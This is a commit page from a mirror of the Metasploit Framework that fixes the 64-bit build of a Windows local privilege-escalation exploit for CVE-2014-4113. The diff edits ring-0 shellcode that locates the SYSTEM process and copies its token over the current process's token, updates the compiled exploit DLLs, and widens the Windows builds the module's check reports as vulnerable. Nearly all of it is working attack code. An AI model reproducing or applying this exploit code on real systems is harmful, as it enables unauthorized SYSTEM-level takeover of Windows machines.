infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix the 64 bits code

bug/bundler_fix
jvazquez-r7 2014-10-30 17:01:59 -05:00
parent 03a84a1de3
commit 6574db5dbb
4 changed files with 10 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
View File

Binary file not shown.

15
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c vendored
View File

@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
OUT PVOID Process
);
typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
_Inout_ PVOID Process
);
@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
BOOL find_and_replace_member(PDWORD Structure,
DWORD CurrentValue,
DWORD NewValue,
DWORD MaxSize)
@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure,
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
#ifdef _M_X64
Mask = ~0xf;
#else
Mask = ~7;
#endif
// Mask out the reference count.
CurrentValue &= Mask;
@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);
TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = pPsReferencePrimaryToken(pSystemInfo);
// Find the token in the target process, and replace with the system token.
FindAndReplaceMember((PDWORD)pMyProcessInfo,
find_and_replace_member((PDWORD)pMyProcessInfo,
(DWORD)TargetToken,
(DWORD)SystemToken,
0x200);

6
modules/exploits/windows/local/ms14_058_track_popup_menu.rb
View File

@ -94,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local
return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
return Exploit::CheckCode::Unknown
end